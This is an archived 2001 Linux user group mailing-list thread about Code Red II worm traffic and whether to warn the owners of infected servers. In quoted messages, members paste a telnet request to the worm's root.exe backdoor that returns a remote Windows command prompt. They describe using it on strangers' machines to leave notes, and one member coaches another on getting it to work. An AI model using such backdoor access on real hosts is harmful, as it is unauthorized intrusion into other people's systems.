CR worm infection attempts

Derek Neighbors plug-discuss@lists.PLUG.phoenix.az.us
Wed, 8 Aug 2001 16:10:44 -0500 (CDT) 

That is the problem.

I looked at my logs out of curiosity.  I was AMAZED at the figured.  I
took the first IP and hit it and checked for the root.exe exploit.  Sure
enough it was WIDE open.

Now I had a DILEMMA on my hands.  Do I notify this company or not?  I had
no malicous intent nor did I do anything.  The 'good' in me wanted to
notify them so that they were not 'toasted' by one will 'ill' intent.

HOWEVER, I feared lawsuit, death and dismemberment.  So I said not a word.
I looked at thier website about 4 hours later and they were defaced. :(

What kind of a world is it?  I mean if I was walking down the street with
my fly open, I would hope to God someone would tell me.  However, I
suppose even in that case you should be careful.  I mean after all,
noftifying someone that thier fly was open, means you were looking at
thier crotch.  If you were looking at their crotch you must have been
wanting to rape them or harass them.

Where does the silliness stop?  

-Derek

On Wed, 8 Aug 2001, Kim Allen wrote:

> I've been contacting the sites that my server logs shows that have been 
> hitting me with the code red signature and so far no one has bothered to 
> respond except for one. However that site has told me how secure they are 
> and how there is no way that they have any problems. When I sent them the 
> portions of my server logs showing they do have problem they threaten 
> legal action. Anyone else have had this type of response?
> 
> > To answer your question... make sure you're hitting enter TWICE after
> > the command.
> > 
> > As a security guy myself, I'm deeply troubled by what I'm finding.
> > Check it out:
> > 
> > [gary@t0psecret /tmp]# telnet xxx.xxx.xxx.xxx 80
> > Trying xxx.xxx.xxx.xxx...
> > Connected to xxx.xxx.xxx.xxx.
> > Escape character is '^]'.
> > GET /scripts/root.exe HTTP/1.0
> > 
> > HTTP/1.1 200 OK
> > Server: Microsoft-IIS/5.0
> > Date: Mon, 06 Aug 2001 04:22:13 GMT
> > Content-Type: application/octet-stream
> > Microsoft Windows 2000 [Version 5.00.2195]
> > (C) Copyright 1985-1999 Microsoft Corp.
> > 
> > c:\inetpub\scripts>
> > 
> > >From here, I've been leaving a nice text file on \\ALL USERS\\ desktop's
> > that explains how I did it, and why they need to pay attention to
> > security patches. :)
> > 
> > Hopefully they won't take it the 'wrong' way.
> > 
> > ~g~
> > 
> > On 05 Aug 2001 15:15:02 -0700, Craig White wrote:
> > > Wayne Conrad wrote:
> > > > 
> > > > On Sun, 05 August 2001, "J.Francois" wrote:
> > > > > I got tired of counting and just started putting the info into my IDS page.
> > > > > That way I can send complaints and point them to a URL so I don't have to
> > > > > keep recreating the same data each time.
> > > > 
> > > > Are you putting the IP's up too?  Every one of the CRII infected boxes is rooted...  I wonder about the goodness of publishing a list of known rooted boxes.
> > > >     Wayne
> > > ________________________________________________
> > > 
> > > I've been trying that out
> > > 
> > > telnet ipaddress_from_my_httpd_access_log 80
> > > 
> > > GET /scripts/root.exe HTTP/1.0
> > > 
> > > but I can't get a command prompt - what am I missing?
> > > 
> > > Craig
> > > ________________________________________________
> > > See http://PLUG.phoenix.az.us/navigator-mail.shtml if your mail doesn't post to the list quickly and you use Netscape to write mail.
> > > 
> > > PLUG-discuss mailing list  -  PLUG-discuss@lists.PLUG.phoenix.az.us
> > > http://lists.PLUG.phoenix.az.us/mailman/listinfo/plug-discuss
> > > 
> > 
> > 
> > ________________________________________________
> > See http://PLUG.phoenix.az.us/navigator-mail.shtml if your mail doesn't post to the list quickly and you use Netscape to write mail.
> > 
> > PLUG-discuss mailing list  -  PLUG-discuss@lists.PLUG.phoenix.az.us
> > http://lists.PLUG.phoenix.az.us/mailman/listinfo/plug-discuss
> > 
> 
> ________________________________________________
> See http://PLUG.phoenix.az.us/navigator-mail.shtml if your mail doesn't post to the list quickly and you use Netscape to write mail.
> 
> PLUG-discuss mailing list  -  PLUG-discuss@lists.PLUG.phoenix.az.us
> http://lists.PLUG.phoenix.az.us/mailman/listinfo/plug-discuss
>